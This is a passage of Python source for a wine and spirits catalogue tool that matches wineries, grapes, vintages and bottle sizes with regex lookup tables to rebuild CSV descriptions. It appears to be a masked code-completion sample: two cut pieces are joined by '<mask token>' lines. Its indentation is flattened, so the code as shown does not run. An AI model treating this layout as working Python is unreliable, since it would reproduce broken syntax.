print('setWinery:fldWine:', rec[fldWine])
except Exception as e:
print('debug error2-continuing:', str(e))
print('fldWine:', fldWine)
if fldWineDescrNew not in rec:
rec[fldWineDescrNew] = rec[fldWineDescr]
winery, reWinery = findWinery(rec, None, None, fldWine, debug=debug)
if winery is None:
if debug:
print('setWinery:winery not found-next record:' + rec[fldWine])
continue
elif winery not in wgLookup:
if debug:
print('setWinery:winery not in wgLookup:', winery)
continue
grape, reGrape = findGrapeByRegex(rec, fldWine, debug=debug)
if debug:
print('setWinery:grape found:', grape)
if winery in ignoreGrapeLookup:
if debug:
print(
'setWinery:winery-match-ignoreGrape:clear-wine:set-grape-to-None:set-nongrape-True:winery:'
, winery)
wine = ''
grape = None
nongrape = True
if winery in noGrapeLookup:
if debug:
print('setWinery:noGrapeLookup wine check:', winery)
wine = wineLookupByName(noGrapeLookup[winery], rec[fldWine], [],
'noGrapeLookup', wineAbbrLookup, debug=debug)
if debug:
print('setWinery:nogrape check:wine:', wine)
if wine == '':
if debug:
print(
'setWinery:noGrapeLookup:matched:None::clear grape:set nongrape to True'
)
grape = None
wine = ''
nongrape = True
elif wine:
grape = None
if debug:
print(
'setWinery:nograpeLookup:wine found - clear grape field'
)
if wine is None and winery in liquorLookup:
if debug:
                print('setWinery:liquorLookup:', winery)
liquor, reLiquor = findLiquor(rec, winery, fldWine, debug=debug)
if liquor is not None:
wine = liquor
if debug:
print('setWinery:liquorLookup-match:', liquor)
if not grape and not nongrape and not wine and liquor is None:
if debug:
print('setWinery:did not find grape-skipping record:', rec[
fldWineDescr])
continue
if debug:
print('setWinery:pre-vintage found values for wine/liquor:',
wine, ':grape:', grape)
vintage = findVintage(rec, fldWine, debug=debug)
if debug:
print('setWinery:vintage:', vintage)
if reCase.search(rec[fldWine]):
case = 'case'
for size, reSize in sizeLookup:
if debug:
print('setWinery:sizeLookup:', size)
if reSize.search(rec[fldWine]) and not reShipsAs.search(rec[
fldWine]):
if debug:
print('setWinery:sizeLookup:matched:', reSize)
break
else:
size = None
if debug:
print('setWinery:sizeLookup:None-found')
qual = findQualifier(rec[fldWine], debug=debug)
if debug:
try:
print('setWinery:FinalAttributes:', winery, ':', grape, ':',
wine, ':', liquor, ':', vintage, ':', case, ':', size,
':', qual, ':', rec[fldWine])
except Exception as e:
print('debug error5-continuing:', str(e))
print('fldWine:', fldWine)
if liquor is not None:
if debug:
print(
'setWinery:liquor flag set - no additional data needs to be collected'
)
elif wine is not None:
if debug:
print(
'setWinery:wine is not None - do additional lookups:wine:',
wine)
if wine in wgLookup[winery] and wgLookup[winery][wine]:
if debug:
print('setWinery:lookup winematchset')
winematchset = findAddAttribWgLookup(rec, winery, wine,
fldWine, wineAbbrLookup, None, valueDescr='wine', debug
=debug)
else:
print('setWinery:unable to perform wgLookup on winery:',
winery, ':wine:', wine, ':rec-wine:', rec[fldWine])
if debug:
try:
print('wgLookup[winery]:', wgLookup[winery])
except Exception as e:
print('debug error3-continuing:', str(e))
print('winery:', winery)
if debug:
print('setWinery:winematchset:', winematchset)
elif grape is not None:
if debug:
print('setWinery:grape is not None - do additional lookups:',
grape)
if grape in wgLookup[winery] and wgLookup[winery][grape]:
grapematchset = findAddAttribWgLookup(rec, winery, grape,
fldWine, wineAbbrLookup, defaultorderlist, valueDescr=
'grape', debug=debug)
elif grape in wgLookup[winery]:
if debug:
print(
'setWinery:grape match: matching record set is blank - no action required'
)
else:
print('setWinery:grape NONMATCH:', rec[fldWine])
if debug:
print('setWinery:liquor:', liquor, ':wine:', wine,
':grape:', grape, ':wgLookup[winery]:', wgLookup[
winery])
if debug:
print('setWinery:grapematchset:', grapematchset)
if vintage:
newVintageLookupWine = rec[fldWine]
for matchvalue in winematchset:
if vintage in matchvalue:
newVintageLookupWine = newVintageLookupWine.replace(
matchvalue, '')
if debug:
print(
'setWinery:2nd-vintage:winematchset:wine-name-removal:'
, matchvalue)
for matchvalue in grapematchset:
if vintage in matchvalue:
newVintageLookupWine = newVintageLookupWine.replace(
matchvalue, '')
if debug:
print(
'setWinery:2nd-vintage:grapematchset:wine-name-removal:'
, matchvalue)
if newVintageLookupWine != rec[fldWine]:
if debug:
print('setWinery:2nd-vintage:newVintageLookupWine:',
newVintageLookupWine)
newVintage = findVintage({fldWine: newVintageLookupWine},
fldWine, debug=debug)
if debug:
print('setWinery:2nd-vintage:newVintage:', newVintage)
vintage = newVintage
wineDescr = ''
if winery.startswith('z'):
vintage = None
if debug:
print('setWinery:winery starts with z: clear vintage')
if winematchset and ' '.join(winematchset) in wine:
if debug:
print('setWinery:clearing-winematchset:', winematchset,
':is-in-wine:', wine)
winematchset = []
if grapematchset and ' '.join(grapematchset) in grape:
if not (len(grapematchset) == 1 and len(grapematchset[0]) == 1):
if debug:
print('setWinery:clearing-grapematchset:',
grapematchset, ':is-in-grape:', grape)
grapematchset = []
if grapematchset and size and size in ' '.join(grapematchset):
size = ''
if winematchset and size and size in ' '.join(winematchset):
size = ''
if debug:
print('setWinery:vallist1:', [winery, grape, wine] +
grapematchset + winematchset + [vintage, size, qual, case])
print('setWinery:vallist2:', [winery, grape, wine, *
grapematchset, *winematchset, vintage, size, qual, case])
wdList = []
for val in ([winery, grape, wine] + grapematchset + winematchset +
[vintage, size, qual, case]):
if val:
wdList.append(val)
wineDescr = ' '.join(wdList)
if False:
if debug:
print('setWinery:wdList:', wdList)
if debug:
print('setWinery:wineDescr:', wineDescr)
if debug:
try:
print(':'.join(['setWinery:wineDescrList', wineDescr, rec[
fldWineDescr], str(wineDescr == rec[fldWineDescr]), rec
[fldWine]]))
except Exception as e:
print('debug error6-continuing:', str(e))
print('fldWine:', fldWine)
rec[fldWineDescrNew] = wineDescr
if fldWineDescrMatch:
rec[fldWineDescrMatch] = rec[fldWineDescr] == rec[fldWineDescrNew]
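# setWineryDescrFromWineryGrapeLookup rebuilds fldWineDescrNew for every row
# as winery + grape/wine + matched wgLookup tokens + vintage/size/qualifier/
# case, and, when fldWineDescrMatch is set, records whether the rebuilt
# string equals the existing description.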
def setDigitFld2Value(wines, fld, value, debug=False):
for rec in wines:
if rec[fld].isdigit():
rec[fld] = value
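# Hypothetical usage: setDigitFld2Value(wines, 'winedescr', '') blanks any
# description that is purely numeric (rec[fld].isdigit()).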
def updateFileOptionDictCheck(optiondict, wines, header, debug=False):
if optiondict['fldWineDescr'] not in wines[0]:
if debug:
print('updateFileOptionDictCheck:fldWineDescr NOT in file read in:'
, optiondict['fldWineDescr'])
if 'cnt' in wines[0]:
print('setting values fldWineDescr and fldWineDescrNew to: cnt')
optiondict['fldWineDescr'] = optiondict['fldWineDescrNew'] = 'cnt'
elif 'winedescr' in wines[0]:
print(
'setting values fldWineDescr to winedescr and fldWineDescrNew to winedescrnew'
)
optiondict['fldWineDescr'] = 'winedescr'
optiondict['fldWineDescrNew'] = 'winedescrnew'
else:
print('could not find fldWineDescr in wines[0]-aborting:',
optiondict['fldWineDescr'], '\nwines[0]:', wines[0])
error = wines[0][optiondict['fldWineDescr']]
if False and optiondict['fldWineDescr'] == 'winedescr':
if not optiondict['fldWineDescrMatch']:
optiondict['fldWineDescrMatch'] = 'same'
print('setting value fldWineDescrMatch to: same')
if optiondict['csvfile_update_in'] == optiondict['csvfile_update_out']:
file_path, base_filename, file_ext = kvutil.filename_split(optiondict
['csvfile_update_in'])
backupfile = kvutil.filename_proper(base_filename + optiondict[
'backupfile_ext'], file_path)
print('copying ', optiondict['csvfile_update_in'], ' to ', backupfile)
shutil.copyfile(optiondict['csvfile_update_in'], backupfile)
if optiondict['fldWineDescrNew'] == 'cnt':
optiondict['csvdictkeys'] = ['cnt', 'date', 'search', 'store',
'wine', 'winesrt']
elif optiondict['fldWineDescrMatch']:
optiondict['csvdictkeys'] = [optiondict['fldWineDescr'], optiondict
['fldWineDescrNew'], optiondict['fldWineDescrMatch'], *header]
else:
optiondict['csvdictkeys'] = [optiondict['fldWineDescrNew']] + header[1:
]
print('updateFileOptionDictCheck:set csvdictkeys to:', optiondict[
'csvdictkeys'])
<mask token>
| <mask token>
import kvutil
import kvcsv
import re
import sys
import shutil
import pprint
pp = pprint.PrettyPrinter(indent=4)
ppFlag = False
optiondictconfig = {'AppVersion': {'value': '1.13', 'description':
'defines the version number for the app'}, 'debug': {'value': False,
'type': 'bool', 'description':
'defines if we are running in debug mode'}, 'verbose': {'value': 1,
'type': 'int', 'description':
'defines the display level for print messages'}, 'setup_check': {
'value': False, 'type': 'bool', 'description':
'defines if we checking out setup'}, 'pprint': {'value': False, 'type':
'bool', 'description':
'defines if we output with pretty print when debugging'},
'csvfile_master_in': {'value': 'wine_xref.csv', 'description':
'defines the name of the master data input file'}, 'csvfile_update_in':
{'value': 'wineref.csv', 'description':
'defines the name of the input file to updated'}, 'csvfile_update_out':
{'value': 'wineref2.csv', 'description':
'defines the name of the updated output file'}, 'fldWine': {'value':
'wine', 'description':
'defines the name of the field that holds the Wine '}, 'fldWineDescr':
{'value': 'winedescr', 'description':
'defines the name of the field holding the wine description'},
'fldWineDescrNew': {'value': 'winedescrnew', 'description':
'defines the name of the NEW field holding the new description '},
'fldWineDescrMatch': {'value': None, 'description':
'defines the name of the NEW field holding the results of comparison existing to new description '
}, 'fldWineMaster': {'value': None, 'description':
'defines the name of the field that holds the Wine when reading the master file '
}, 'fldWineDescrMaster': {'value': None, 'description':
'defines the name of the field holding the wine description when reading the master file'
}, 'backupfile_ext': {'value': '.bak', 'description':
'defines the extension to use to copy the update input file to if we are replacing it with output'
}, 'defaultnew': {'value': None, 'description':
'defines if we should take field fldWineDescrNew and set to a value if not set'
}}
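# Regex lookup tables used by the matchers below: vintageLookup captures 4- or
# 2-digit vintages in various positions (a hypothetical "Caymus Cab '18"
# yields '18'), reCase flags case quantities, and reQualLookup/sizeLookup map
# qualifiers (Gift, Etch, ...) and bottle sizes to canonical labels.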
vintageLookup = re.compile('\\d\\d\\d\\d\\s+\\d\\d(\\d\\d)'), re.compile(
'^\\d\\d(\\d\\d)'), re.compile('\\s\\d\\d(\\d\\d)$'), re.compile(
'\\s\\d\\d(\\d\\d)\\s'), re.compile('XX\\d\\d(\\d\\d)\\s'), re.compile(
'\\s\\d\\d(\\d\\d)\\/'), re.compile("\\s'?(\\d\\d)'?$|\\s'?(\\d\\d)'?\\s")
reCase = re.compile('12\\s*X\\s*750\\s*ML|\\bcase\\b|12\\/750\\s*ML', re.
IGNORECASE)
reQualLookup = (None, re.compile('\\bWithout\\s+Gift\\b|\\bNo\\s+Gift', re.
IGNORECASE)), ('Gift', re.compile('\\bGift\\b', re.IGNORECASE)), ('VAP',
re.compile('\\bVAP\\b', re.IGNORECASE)), ('VAP', re.compile(
'\\bGlassVAP\\b', re.IGNORECASE)), ('Glass', re.compile('\\bGlass\\b',
re.IGNORECASE)), ('Glass', re.compile('\\bGlasses\\b', re.IGNORECASE)), (
'Etch', re.compile('\\bEtch\\b', re.IGNORECASE)), ('Basket', re.compile
('\\bBasket\\b', re.IGNORECASE))
sizeLookup = ('1.75L', re.compile('\\b1\\.75\\s*Li?|\\b1\\.75$', re.IGNORECASE)
), ('1.5L', re.compile('\\b1\\.5\\s*L?\\b|\\bMagnum\\b', re.IGNORECASE)), (
'375mL', re.compile('Half\\s+Bottle|375ml', re.IGNORECASE)), ('200mL',
re.compile('\\b200\\s*ML|\\(200\\s*ML', re.IGNORECASE)), ('50mL', re.
compile('\\b50\\s*ML|\\(50\\s*ML', re.IGNORECASE)), ('500mL', re.
compile('\\b500\\s*ML|\\(500\\s*ML', re.IGNORECASE)), ('3L', re.compile
('\\b3\\s*Li?', re.IGNORECASE)), ('6L', re.compile('\\b6\\s*Li?', re.
IGNORECASE)), ('9L', re.compile('\\b9\\s*Li?', re.IGNORECASE)), ('1L',
re.compile(
'\\b1L\\b|\\b1\\s+L$|\\b1.0\\s*L\\b|\\b1\\s+Liter\\b|\\bOne\\s+Liter\\b|\\bLITER\\b|\\b1\\s*LTR'
, re.IGNORECASE))
wineryLookup = ('Alban', re.compile('\\bAlban\\b', re.IGNORECASE)), ('Arrowood'
, re.compile('\\bArrowood\\b', re.IGNORECASE)), ('Atalon', re.compile(
'\\bAtalon\\b', re.IGNORECASE)), ('Attune', re.compile('\\bAttune\\b',
re.IGNORECASE)), ('Auteur', re.compile('\\bAuteur\\b', re.IGNORECASE)), (
'Austin Hope', re.compile('\\bAustin\\s+Hope\\b', re.IGNORECASE)), ('Badge'
, re.compile('\\bBadge\\b', re.IGNORECASE)), ('Balletto', re.compile(
'\\bBalletto\\b', re.IGNORECASE)), ('Bell', re.compile(
'\\bBell\\s+Cellar', re.IGNORECASE)), ('BR Cohn', re.compile(
'\\bB\\.?\\s?R\\.?\\s+Cohn\\b', re.IGNORECASE)), ('Bremer', re.compile(
'\\bBremer\\b', re.IGNORECASE)), ('Brewer-Clifton', re.compile(
'\\bBrewer[\\s\\-]Clifton\\b', re.IGNORECASE)), ('BV', re.compile(
'\\bBeaulieu\\s+V|\\bBV\\b', re.IGNORECASE)), ('Belle Glos', re.compile
('\\bBelle\\s+Glos\\b', re.IGNORECASE)), ('Bennett Ln', re.compile(
'\\bBennet+\\sLane\\b', re.IGNORECASE)), ('Benovia', re.compile(
'\\bBenovia\\b', re.IGNORECASE)), ('Beringer', re.compile(
'\\bBeringer\\b', re.IGNORECASE)), ('Blackstone', re.compile(
'\\bBlackstone\\b', re.IGNORECASE)), ('Brancott', re.compile(
'\\bBrancott\\b', re.IGNORECASE)), ('Cade', re.compile('\\bCade\\b', re
.IGNORECASE)), ('Cain Five', re.compile(
'\\bCain\\s+Five\\b|\\bCain\\s-\\sFive\\b|\\bCain\\s5\\b|\\bCainFive\\b',
re.IGNORECASE)), ('Cakebread', re.compile('\\bCakebread\\b', re.IGNORECASE)
), ('Cardinale', re.compile('\\bCardinale\\b', re.IGNORECASE)), ('Caymus',
re.compile('\\bCaymus\\b', re.IGNORECASE)), ('Chappellet', re.compile(
'\\bChappellet\\b', re.IGNORECASE)), ('Chalk Hill', re.compile(
'\\bChalk\\s+Hill\\b', re.IGNORECASE)), ('Clos Du Bois', re.compile(
'\\bClos\\s+Du\\s+Bois\\b', re.IGNORECASE)), ('ClosDuVal', re.compile(
'\\bClos\\s+du\\s+Val\\b', re.IGNORECASE)), ('Colgin', re.compile(
'\\bColgin\\b', re.IGNORECASE)), ('Concha Don Melchor', re.compile(
'\\bConcha\\s.*Don\\s+Melchor\\b|Don\\s+Melchor\\b', re.IGNORECASE)), (
'Continuum', re.compile('\\bContinuum\\b', re.IGNORECASE)), ('Corison',
re.compile('\\bCorison\\b', re.IGNORECASE)), ('Cristal', re.compile(
'Roederer\\s?.*Cristal\\b|\\bCristal\\b.+Brut', re.IGNORECASE)), ('Curran',
re.compile('\\bCurran\\b', re.IGNORECASE)), ('Darioush', re.compile(
'\\bDarioush\\b', re.IGNORECASE)), ('Darioush', re.compile(
'\\bCaravan\\b', re.IGNORECASE)), ('David Arthur', re.compile(
'\\bDavid\\s+Arthur\\b', re.IGNORECASE)), ('David Bruce', re.compile(
'\\bDavid\\s+Bruce\\b', re.IGNORECASE)), ('Davis Family', re.compile(
'\\bDavis\\s+Family\\b', re.IGNORECASE)), ('Del Dotto', re.compile(
'\\bDel\\s+Dotto\\b', re.IGNORECASE)), ('Dominus', re.compile(
'\\bDominus\\b', re.IGNORECASE)), ('Goldeneye', re.compile(
'\\bGoldeneye\\b', re.IGNORECASE)), ('Paraduxx', re.compile(
'\\bParaduxx\\b', re.IGNORECASE)), ('Domaine Carneros', re.compile(
'\\bDomaine\\s+Carneros\\b', re.IGNORECASE)), ('Dominus', re.compile(
    '\\bDominus\\b', re.IGNORECASE)), ('Drappier', re.compile(
'\\bDrappier\\b', re.IGNORECASE)), ('Duckhorn', re.compile(
'\\bDuckhorn\\b', re.IGNORECASE)), ('Dumol', re.compile('\\bDumol\\b',
re.IGNORECASE)), ('Dunn', re.compile('\\bDunn\\b', re.IGNORECASE)), (
'Ehlers', re.compile('\\bEhlers\\b', re.IGNORECASE)), ('Etude', re.
compile('\\bEtude\\b', re.IGNORECASE)), ('Far Niente', re.compile(
'\\bFar Niente\\b', re.IGNORECASE)), ('Flora', re.compile(
'\\bFlora\\s+Springs\\b', re.IGNORECASE)), ('Flowers', re.compile(
'\\bFlowers\\b', re.IGNORECASE)), ('Robert Foley', re.compile(
'\\bRobert\\s+\\bFoley\\b', re.IGNORECASE)), ('Foley', re.compile(
'\\bFoley\\b', re.IGNORECASE)), ('Foxen', re.compile('\\bFoxen\\b', re.
IGNORECASE)), ('Franciscan', re.compile('\\bFranciscan\\b', re.IGNORECASE)
), ('Frank Family', re.compile('\\bFrank Family\\b', re.IGNORECASE)), (
'Gary Farrell', re.compile('\\bGary\\s+Farrel+\\b', re.IGNORECASE)), (
'Ghost Block', re.compile('\\bGhost\\s+Block\\b', re.IGNORECASE)), (
'Grgich', re.compile('\\bGrgich\\b', re.IGNORECASE)), ('Groth', re.
compile('\\bGroth\\b', re.IGNORECASE)), ('Gundlach', re.compile(
'\\bGundlach\\b', re.IGNORECASE)), ('Hansel', re.compile('\\bHansel\\b',
re.IGNORECASE)), ('Hanzell', re.compile('\\bHanzell\\b', re.IGNORECASE)), (
'Hess', re.compile('\\bHess\\b', re.IGNORECASE)), ('Hewitt', re.compile
('\\bHewitt\\b', re.IGNORECASE)), ('Hobbs', re.compile(
'\\bHobbs\\b|\\bcrossbarn\\b', re.IGNORECASE)), ('Hundred Acre', re.
compile('\\bHundred\\s+Acre\\b', re.IGNORECASE)), ('Jordan', re.compile
('\\bJordan\\b', re.IGNORECASE)), ('Justin', re.compile('\\bJustin\\b',
re.IGNORECASE)), ('Kim Crawford', re.compile('\\bKim\\s+Crawford\\b',
re.IGNORECASE)), ('Kistler', re.compile('\\bKistler\\b', re.IGNORECASE)), (
'Kosta', re.compile('\\bKosta\\s+Browne?\\b', re.IGNORECASE)), ('Krug',
re.compile('\\bKrug\\b', re.IGNORECASE)), ('Kunde', re.compile(
'\\bKunde\\b', re.IGNORECASE)), ('LaCrema', re.compile(
'\\bLa\\s?Crema\\b', re.IGNORECASE)), ('Lewis', re.compile(
'\\bLewis\\b', re.IGNORECASE)), ('Lokoya', re.compile('\\bLokoya\\b',
re.IGNORECASE)), ('Meiomi', re.compile('\\bMeiomi\\b', re.IGNORECASE)), (
'Melville', re.compile('\\bMelville\\b', re.IGNORECASE)), ('Momento Mori',
re.compile('\\bMomento\\s+Mori\\b', re.IGNORECASE)), ('Mondavi', re.
compile('\\bMondavi\\b', re.IGNORECASE)), ('Montelena', re.compile(
'\\bMontelena\\b', re.IGNORECASE)), ('Mt Veeder', re.compile(
'^Mount\\s+Veeder\\b|^Mt\\.? Veeder\\b|\\d+\\s+M[^t]*t\\s+Veeder\\b',
re.IGNORECASE)), ('Newton', re.compile('\\bNewton\\b', re.IGNORECASE)), (
'Nickel', re.compile('\\bNickel\\b', re.IGNORECASE)), ('Opus One', re.
compile('\\bOpus\\s+One\\b', re.IGNORECASE)), ('P Togni', re.compile(
'\\bTogni\\b', re.IGNORECASE)), ('Pahlmeyer Jayson', re.compile(
'\\bJayson\\b', re.IGNORECASE)), ('Pahlmeyer', re.compile(
'\\bPahlmeyer\\b(?!\\s*Jay)', re.IGNORECASE)), ('Papillon', re.compile(
'\\bPapillon\\b', re.IGNORECASE)), ('Patz', re.compile('\\bPatz\\b', re
.IGNORECASE)), ('Phelps', re.compile('\\bPhelps\\b', re.IGNORECASE)), (
'Plumpjack', re.compile('\\bPlumpjack\\b', re.IGNORECASE)), ('Pride',
re.compile('\\bPride\\b', re.IGNORECASE)), ('Prisoner', re.compile(
'\\bPrisoner\\b', re.IGNORECASE)), ('Provenance', re.compile(
'\\bProvenance\\b', re.IGNORECASE)), ('R Sinskey', re.compile(
'\\bSinskey\\b', re.IGNORECASE)), ('Ramey', re.compile('\\bRamey\\b',
re.IGNORECASE)), ('Revana', re.compile('\\bRevana\\b', re.IGNORECASE)), (
'Raptor', re.compile('\\bRaptor\\s+Ridge\\b', re.IGNORECASE)), ('Revana',
re.compile('\\bRevana\\b', re.IGNORECASE)), ('Ridge', re.compile(
'\\bRidge\\b', re.IGNORECASE)), ('Robert Foley', re.compile(
'\\bRobert\\s+Foley\\b', re.IGNORECASE)), ('Rombauer', re.compile(
'\\bRombauer\\b', re.IGNORECASE)), ('Rudd', re.compile('\\bRudd\\b', re
.IGNORECASE)), ('Scarecrow', re.compile('\\bScarecrow\\b', re.IGNORECASE)
), ('Sea Smoke', re.compile('\\bSea\\s+Smoke\\b', re.IGNORECASE)), (
'Seghesio', re.compile('\\bSeghesio\\b', re.IGNORECASE)), ('Shafer', re
.compile('\\bShafer\\b', re.IGNORECASE)), ('Sherwin', re.compile(
'\\bSherwin\\b', re.IGNORECASE)), ('Silver Oak', re.compile(
'\\bSilver\\s+Oak\\b', re.IGNORECASE)), ('Silverado', re.compile(
'\\bSilverado\\b', re.IGNORECASE)), ('Simi', re.compile('\\bSimi\\b',
re.IGNORECASE)), ('Sonoma Cutrer', re.compile('\\bCutrer\\b', re.
IGNORECASE)), ('Spottswoode', re.compile('\\bSpottswoode\\b', re.
IGNORECASE)), ('Stag Leap', re.compile('\\bStag.*\\sLeap\\b', re.
IGNORECASE)), ('Sullivan', re.compile('\\bSullivan\\b', re.IGNORECASE)), (
'Summerland', re.compile('\\bSummerland\\b', re.IGNORECASE)), ('Summers',
re.compile('\\bSummers\\b', re.IGNORECASE)), ('Tantara', re.compile(
'\\bTantara\\b', re.IGNORECASE)), ('Turnbull', re.compile(
'\\bTurnbull\\b', re.IGNORECASE)), ('Veuve', re.compile('\\bVeuve\\b',
re.IGNORECASE)), ('Viader', re.compile('\\bViader\\b', re.IGNORECASE)), (
'Waterstone', re.compile('\\bWaterstone\\b', re.IGNORECASE)), ('Whitehall',
re.compile('\\bWhitehall\\b', re.IGNORECASE)), ('Wm Selyem', re.compile
('\\bWilliams\\s*\\-?Selyem\\b', re.IGNORECASE)), ('ZD', re.compile(
'\\bZD\\b', re.IGNORECASE)), ('Zaca', re.compile('\\bZaca\\b', re.
IGNORECASE)), ('zBourbon Woodford Res', re.compile(
'\\bWoodford\\s+Reserve\\b', re.IGNORECASE)), ('zBourbon Woodford Res',
re.compile('\\bWoodford\\s+Rsv\\b', re.IGNORECASE)), ('zCognac Courvoisier'
, re.compile('\\bCourvoisier\\b', re.IGNORECASE)), ('zCognac Hennessy',
re.compile('\\bHennesse?y\\b', re.IGNORECASE)), ('zCognac Remy', re.
compile('\\bRemy\\s+Martin\\b|\\bRemy\\s+Louis', re.IGNORECASE)), (
'zCointreau', re.compile('\\bCointreau\\b', re.IGNORECASE)), (
'zGin Hendrick', re.compile('\\bHendrick', re.IGNORECASE)), (
'zGin Tanqueray', re.compile('\\bTanqueray\\b', re.IGNORECASE)), (
'zRum Mt Gay', re.compile('\\bMount\\s+Gay\\b|\\bMt\\s+Gay', re.IGNORECASE)
), ('zRum Ron Zacapa', re.compile('\\bRon\\s+Zacapa\\b', re.IGNORECASE)), (
'zRye Hayden', re.compile('\\bBasil\\s+Hayden\\b', re.IGNORECASE)), (
'zSambuca', re.compile('\\bSambuca\\b', re.IGNORECASE)), (
'zScotch Glenmorangie', re.compile('\\bGlenmorangie\\b', re.IGNORECASE)), (
'zScotch Hibiki Harmony', re.compile('\\bHibiki\\s.*Harmony\\b', re.
IGNORECASE)), ('zScotch Hibiki', re.compile('\\bHibiki\\b(?!\\s*Har)',
re.IGNORECASE)), ('zScotch Macallan', re.compile('\\bMacallan\\b', re.
IGNORECASE)), ('zTeq Campo Azul', re.compile('\\bCampo\\s+Azul\\b', re.
IGNORECASE)), ('zTeq Casamigos', re.compile('\\bCasamigos\\b', re.
IGNORECASE)), ('zTeq Casino Azul', re.compile('\\bCasino\\s+Azul\\b',
re.IGNORECASE)), ('zTeq Clase Azul', re.compile('\\bClase\\s+Azul\\b',
re.IGNORECASE)), ('zTeq Cuervo', re.compile(
'\\bJose\\s+Cuervo\\b|^Cuervo\\b', re.IGNORECASE)), ('zTeq Don Julio',
re.compile('\\bDon\\s+Julio\\b', re.IGNORECASE)), ('zTeq Dos Artes', re
.compile('\\bDos\\s+Artes\\b|^Cuervo\\b', re.IGNORECASE)), (
'zTeq Gran Cava', re.compile('\\bGran\\s+Cava\\b', re.IGNORECASE)), (
'zTeq Herradura', re.compile('\\bHerradura\\b', re.IGNORECASE)), (
'zTeq Loma Azul', re.compile('\\bLoma\\s+Azul\\b', re.IGNORECASE)), (
'zTeq Padre Azul', re.compile('\\bPadre\\s+Azul\\b', re.IGNORECASE)), (
'zTeq Partida', re.compile('\\bPartida\\b', re.IGNORECASE)), ('zTeq Patron'
, re.compile('\\bPatron\\b', re.IGNORECASE)), ('zTripleSec Gr Marnier',
re.compile('\\bGrand\\s+Marnier\\b', re.IGNORECASE)), (
'zTripleSec Dekuyper', re.compile('\\bDekuyper\\b', re.IGNORECASE)), (
'zTripleSec Hiram', re.compile('\\bHiram\\b', re.IGNORECASE)), (
'zVodka Absolut', re.compile('\\bAbsolut\\b', re.IGNORECASE)), (
'zVodka Skyy', re.compile('\\bSkyy\\b', re.IGNORECASE)), ('zVodka Tito',
re.compile('\\bTito', re.IGNORECASE)), ('zWhiskey Balvenie', re.compile
('\\bBalvenie\\b', re.IGNORECASE)), ('zWhiskey J Walker', re.compile(
'\\bJohn+ie\\s+Walker\\b', re.IGNORECASE))
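# wineryLookup pairs each canonical winery or spirit label with its regex;
# labels prefixed with 'z' are spirits (bourbon, cognac, tequila, vodka, ...)
# so they sort after wines, and setWineryDescrFromWineryGrapeLookup clears the
# vintage for any label starting with 'z'.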
grapeLookup = ('Cab Franc', re.compile(
'\\bCabernet\\s+Franc|\\bCab\\s+Franc', re.IGNORECASE)), ('Cab', re.
compile('\\bCabernet\\b|\\sCS\\s|\\sCS$|\\bCab\\b', re.IGNORECASE)), (
'Claret', re.compile('\\bClaret\\b', re.IGNORECASE)), ('Rose Pinot', re
.compile('\\bRose\\b.*\\bPinot\\b|\\bPinot\\b.*\\bRose\\b', re.IGNORECASE)
), ('Pinot', re.compile('\\bPinot\\b|\\bPN\\b|\\bP\\s+Noir\\b', re.
IGNORECASE)), ('Merlot', re.compile('\\bMerlot\\b|\\bME\\b', re.IGNORECASE)
), ('Sauv Blanc', re.compile('\\bSauvignon\\s+Blanc\\b|\\bSB\\b', re.
IGNORECASE)), ('Sauv Blanc', re.compile(
'\\bSauvignon\\/Fume\\s+Blanc\\b', re.IGNORECASE)), ('Meritage', re.
compile('\\bMeritage\\b', re.IGNORECASE)), ('Fume', re.compile(
'\\bFume\\b|\\bFumé', re.IGNORECASE)), ('Champagne', re.compile(
'\\bChampagne\\b', re.IGNORECASE)), ('Chard', re.compile(
'\\bChar+d|\\bCH\\b', re.IGNORECASE)), ('Shiraz', re.compile(
'\\bShiraz\\b', re.IGNORECASE)), ('Syrah', re.compile(
'\\bSyrah\\b|\\bSY\\b', re.IGNORECASE)), ('Zin', re.compile(
'\\bZinfandel\\b|\\bZIN\\b|\\bZN\\b', re.IGNORECASE)), ('Rose', re.
compile('\\bRose\\b|\\bRosé', re.IGNORECASE)), ('Sangiovese', re.
    compile('\\bSangiovese\\b', re.IGNORECASE)), ('Gewurzt', re.compile(
'\\bGew.rztraminer\\b|\\bGewürzt', re.IGNORECASE)), ('Malbec', re.
compile('\\bMalbec\\b', re.IGNORECASE)), ('Viognier', re.compile(
'\\bViognier\\b', re.IGNORECASE)), ('Roussanne', re.compile(
'\\bRoussanne\\b', re.IGNORECASE)), ('Charbono', re.compile(
'\\bCharbono\\b', re.IGNORECASE)), ('PSirah', re.compile(
'\\bPetite Sirah\\b', re.IGNORECASE)), ('Cuvee', re.compile(
'\\bCuvee\\b', re.IGNORECASE)), ('Red', re.compile(
'\\bRed\\b|\\bBordeaux\\s+Blend\\b', re.IGNORECASE)), ('Syrah-Cab', re.
compile('\\bSyrcab\\b|\\bsyrah[-\\s\\/]+cab', re.IGNORECASE)), ('Grenache',
re.compile('\\bGrenache\\b', re.IGNORECASE)), ('Tempranillo', re.
compile('\\bTempranillo\\b', re.IGNORECASE))
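# grapeLookup is ordered most-specific-first ('Cab Franc' before 'Cab',
# 'Rose Pinot' before 'Pinot' or 'Rose') because findGrapeByRegex and
# findGrapeByStr take the first match.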
ignoreGrapeLookup = {'Cristal': ['Rose', None], 'Domaine Carneros': ['Brut',
None], 'Dominus': [None], 'Papillon': None, 'Paraduxx': None, 'Veuve':
None, 'zCointreau': None, 'zGin Hendrick': None, 'zGin Tanqueray': [
'Ten', None], 'zTripleSec Gr Marnier': ['1880', '100th', 'Cent', 'Quin',
None], 'zTripleSec Dekuyper': None, 'zTripleSec Hiram': None,
'zVodka Skyy': ['Citrus', None], 'zVodka Tito': None}
noGrapeLookup = {'Ehlers': ['120-80'], 'Alban': ['Pandora'], 'BV': [
'Tapestry', 'Latour'], 'Bennett Ln': ['Maximus'], 'Bremer': [
'Austintatious'], 'Cain Five': None, 'Colgin': ['Cariad', 'IX'],
'Concha Don Melchor': None, 'Continuum': None, 'Darioush': ['Duel',
'Darius'], 'Duckhorn': ['Discussion'], 'Far Niente': ['Dolce'], 'Flora':
['Trilogy'], 'Franciscan': ['Magnificat'], 'Grgich': ['Violetta'],
'Gundlach': ['Vintage Reserve'], 'Justin': ['Isosceles'], 'Krug': [
'Generations'], 'Mondavi': ['Maestro'], 'Newton': ['Puzzle'],
'Opus One': None, 'Phelps': ['Insignia'], 'Prisoner': ['Cuttings',
'Derange', 'Saldo', 'Blindfold'], 'Ridge': ['Monte Bello'],
'Robert Foley': ['Griffin'], 'Sullivan': ['Coeur de Vigne'], 'Zaca': [
